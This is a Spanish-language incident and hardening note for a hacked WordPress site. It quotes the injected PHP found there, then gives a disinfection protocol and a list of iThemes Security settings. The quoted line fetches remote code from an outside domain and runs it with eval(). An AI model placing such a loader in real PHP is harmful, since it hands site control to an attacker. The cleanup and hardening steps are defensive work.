Diccionario de WordPress

Antecedentes

 
$v=file_get_contents("http://w2w.specialadves.com/steps/s0.txt");
$v=str_replace("<?php","",$v);eval($v);

Protocolo de desinfección aplicado

1. Borrado de archivos
   1. Determinar versión con el archivo wp-includes/version.php: $wp_version = '5.3.12';
   2. Borrar todo menos wp-content
   3. Borrado de archivos de wp-content .hph de 08/04/2022
   4. Borrado de algún ficheros .hph
   5. No se borran las carpetas de los temas
2. Base de datos
   1. Subir base de datos y reparar
   2. Borrar registro 2022 de wp-post.
   3. Buscar en base de datos specialadves. No se detecta en ningún registro
3. Reinstalar WordPress
   1. Se busca la versión original de WordPress
   2. Descargar y subir los archivos de WordPress mediante FTP
   3. Reparar y asegurar
4. Actualizar WordPress:
   1. Borrar usuario admin con nombre poco habitual.
   2. Cambiar contraseña débil del usuario admin por una de seguridad.
   3. Actualizar WordPress
   4. Actualizar PHP de 5.6 (muy obsoleto) a 7.4 en hosting
   5. Actualizar todos los plugins
   6. Activar SSL que estaba incluido en el contrato.
   7. Instalar Really Simple SSL.
   8. Instalación del plugin iThemes Security. Activar y configurar
   9. Revisión general para comprobar las diferentes áreas de la página.

Estos son acciones que se deben tener en cuenta al aplicar la capa de seguridad:

• Auditoria de Cabeceras: Comprueba las cabeceras de una página Web
• Auditoría WP-Doctor: Pasar la auditoría de seguridad de WP-Doctor y obtener la información
• Avisos de incidencias: El sistema de seguridad avisa por email al administrador en caso de incidencia.
• Bloqueo de IP por lista HackRepair.com: Se bloquean automáticamente las IP que figuran en la lista.
• Bloqueo de IP por reincidencia: Se bloquean automáticamente las IP de infractores reincidentes y se guardan en una lista negra. Hay parámetros para determinar el nivel de reincidencia.
• Detección 404 automática: Bloquea IP de usuarios que generan muchos errores 404 en poco tiempo. Son robots rastreadores de URL para intentar acceder a la Web.
• Modo reposo: No permtie acceder al escritorio de WordPress a determinadas horas.
• Cambiar prefijo de tablas wp_: Dificulta ataques por ScriptsSQL. Obligatorio hacer una copia de seguridad previa. Confirmar que los plugins y el theme lo tienen en cuenta.
• Copias de seguridad de bases de datos: Realizar una copia periódica de la base de datos semanalmente o diaramente. Opción de recibirla por email
• Detección de cambios de archivo: Comprueba los cambios en los archivos de WordPress previniendo posibles inyecciones de código maligno.
• Ocultar escritorio: Oculta los accesos habituales de Admin, wp-login, etc. Obligatorio en sitios de un solo adminitrador.
• Activar protección contra fuerza bruta en red: Evita la mayoría de ataques que recibe un sitio
• Cadenas de consulta sospechosas: Estas cadenas suelen ser signos de alguien que trata de obtener acceso al sitio Web. ATENCIÓN algunos plugins y temas también pueden ser bloqueados.
• Cadenas URL largas: Limita el número de caracteres que se pueden enviar en la dirección URL, usado para tratar de inyectar información en su base de datos.
• Desactivar PHP en los plugins: Desactiva la ejecución de PHP en el directorio de plugins. Esto bloquea las peticiones a los archivos de PHP dentro del directorio de plugins que pueden ser explotados directamente.
• Desactivar PHP en temas: Desactiva la ejecución de PHP en el directorio de temas. Esto bloquea la peticiones a ficheros PHP dentro de los directorios del tema que pueden ser atacados directamente.
• Desactivar PHP en uploads: Bloquea las peticiones a los archivos de PHP subidos maliciosamente al directorio de subidas.
• Eliminar permisos de escritura de archivos: Evita a scripts y usuarios el poder escribir en los archivos wp-config.php y .htaccess.
• Filtrar métodos de petición: Filtrar las visitas con los métodos de rastreo, eliminar de petición.
• Navegación de directorios: Impide ver una lista de archivos en un directorio
• Protección de archivos: Proteger archivos del sistema readme.html, readme.txt, wp-config.php, install.php, wp-includes, y. htaccess.
• Red de protección contra ataques: Esta red contra atacantes encontrados en otros sitios que utilizan iThemes Security.
• Requisitos de contraseñas: Obliga a los usuarios a usar contraseñas seguras.
• WP Acceso restringido a la API REST: La mayoría de las peticiones requerirán un usuario conectado o con un privilegio exclusivo,
• WP Bloquea las solicitudes XML-RPC: Bloquea las solicitudes XML-RPC que contienen múltiples intentos de inicio de sesión.
• WP Desactiva el editor de archivos de plugins y temas: Los plugins y temas se deben editar manualmente mediante una herramienta distinta a WordPress.
• WP Desactiva la página del autor sin publicaciones: Esto hace que sea más difícil para los robots determinar los nombres de usuario mediante la desactivación de colocar archivos para los usuarios que no publiquen en su sitio.
• WP Desactivar función XML-RPC: La funcionalidad XML-RPC de WordPress permite a servicios externos acceder y modificar contenido en el sitio. Lo usa el plugin Jetpack, la aplicación móvil de WordPress y los pingbacks.
• WP Desactivar mensajes de error de inicio de sesión: Evita que los mensajes de error se muestren a un usuario en un intento fallido de inicio de sesión.
• WP Eliminar la cabecera RSD (Real Simple Discovery): Si la web no se integra con servicios externos XML-RPC como Flickr entonces la función "RSD" es bastante inútil.
• WP Evitar que las miniaturas de adjuntos se traspasen a otros archivos.: Ayuda a mitigar un ataque en el que los usuarios con perfil de "autor" o superior podrían borrar cualquier archivo de tu instalación de WordPress, incluidos archivos sensibles como wp-config.php.
• WP Forzar a los usuarios a elegir un alias único: Evita que los bots y los atacantes obtengan con facilidad los nombres de usuario de acceso a partir del código de páginas de autor. D
• WP Protección contra el tabnapping: Alterar enlaces target="_blank" para protegerte del tabnapping. Proteger a los visitantes de ataques de phishing lanzados por un sitio enlazado
• WP Quita la cabecera de Windows Live Writer: Esto no es necesario si no utilizas Windows Live Writer u otros clientes de blogs que se basen en este archivo.
• WP Reducir comentarios spam: Reduce el spam en los comentarios por negar comentarios de los robots sin remitente o sin un agente de usuario identificado.
• WP Archivos de Licencia: Renombrar archivos que informan de la versión de WordPress como los tipo License. Se conoce como Information Leak.
• WP cabeceras HTTP de seguridad: Añadir cabeceras HTTP de seguridad en WordPress. 1. X-Content-Type-Options. El objetivo de establecer esta cabecera es evitar que se cargue un archivo JS ó CSS con un MIME-Type diferente al declarado. 2. X-Frame-Options. La cabecera X-Frame-Options sirve para prevenir que la página pueda ser abierta en un frame, o iframe. De esta forma se pueden prevenir ataques de clickjacking sobre tu web. 3. Content-Security-Policy. Content Security Policy (CSP) es un estándar de seguridad informático introducido para evitar cross-site scripting (XSS), clickjacking y otros ataques de inyección de código resultantes de la ejecución de contenido malicioso en el contexto de la página web.
• Instalar un firewall: Un firewall o muro cortafuegos protege a la página Web de ataques externos.